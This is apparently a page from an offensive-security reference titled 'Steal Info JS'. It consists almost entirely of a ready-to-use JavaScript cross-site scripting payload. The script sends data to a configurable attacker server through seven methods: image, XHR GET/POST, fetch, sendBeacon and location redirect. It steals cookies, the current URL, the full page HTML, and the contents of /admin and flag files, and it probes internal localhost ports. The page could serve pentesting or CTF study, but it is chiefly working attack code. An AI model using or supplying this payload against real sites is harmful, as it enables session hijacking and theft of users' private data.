Steal Info JS
```javascript // SELECT HERE THE EXFILTRATION MODE (more than 1 can be selected) // If any GET method is selected (like location or RQ_GET), it's recommended to exfiltrate each info 1 by 1 var ATTACKER_SERVER = "https://weecosb5a2k7jc0cwlyksg9qzh57tw.burpcollaborator.net" var EXFIL_BY_IMG = false var EXFIL_BY_RQ_GET = false var EXFIL_BY_RQ_POST = true var EXFIL_BY_FETCH_GET = false var EXFIL_BY_FETCH_POST = false var EXFIL_BY_NAV = false
var EXFIL_BY_LOC = false var ALL_INFO = "" // Only used by Location exfiltration
// Function to make the data possible to transmit via either GET or POST function encode(text){ return encodeURI(btoa(text)); }
// Functions to exfiltrate the information function exfil_info(info_name, text, is_final=false){ if (EXFIL_BY_IMG) exfil_by_img(info_name, text); if (EXFIL_BY_RQ_GET) exfil_by_rq_get(info_name, text); if (EXFIL_BY_RQ_POST) exfil_by_rq_post(info_name, text); if (EXFIL_BY_FETCH_GET) exfil_by_fetch_get(info_name, text); if (EXFIL_BY_FETCH_POST) exfil_by_fetch_post(info_name, text); if (EXFIL_BY_NAV) exfil_by_nav(info_name, text); if (EXFIL_BY_LOC){ if (is_final) exfil_by_loc(info_name, text); else ALL_INFO += "\n\n" + info_name + "=" + text; } }
function exfil_by_img(info_name, text){ new Image().src = ATTACKER_SERVER + "/exfil_by_img/" + info_name + "?" + info_name + "=" + text }
function exfil_by_rq_get(info_name, text){ var xhttp = new XMLHttpRequest(); xhttp.open("GET", ATTACKER_SERVER + "/exfil_by_rq_get/" + info_name + "?" + info_name + "=" + text, true); xhttp.send(); }
function exfil_by_rq_post(info_name, text){ var xhttp = new XMLHttpRequest(); xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true); xhttp.send(text); }
function exfil_by_fetch_get(info_name, text){ fetch(ATTACKER_SERVER + "/exfil_by_fetch_get/" + info_name + "?" + info_name + "=" + text, {method: 'GET', mode: 'no-cors'}); }
function exfil_by_fetch_post(info_name, text){ fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {method: 'POST', mode: 'no-cors', body: text}); }
function exfil_by_nav(info_name, text){ navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text) }
function exfil_by_loc(info_name, text){ document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO); }
// Functions to get the data to exfiltrate function exfil_page_content(url){ var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { exfil_info(url, encode(xhr.responseText)); } } xhr.open('GET', url, true); xhr.send(null); }
function exfil_internal_port(port){ fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => { exfil_info("internal_port", encode(port)); }); }
// Info to exfiltrate exfil_info("cookies", encode(document.cookie)); exfil_info("current_url", encode(document.URL)); exfil_info("current_content", encode(document.documentElement.innerHTML)); exfil_page_content("/"); exfil_page_content("/admin"); // If 404 nothing will be sent exfil_page_content("/flag"); exfil_page_content("/flag.txt");
Last updated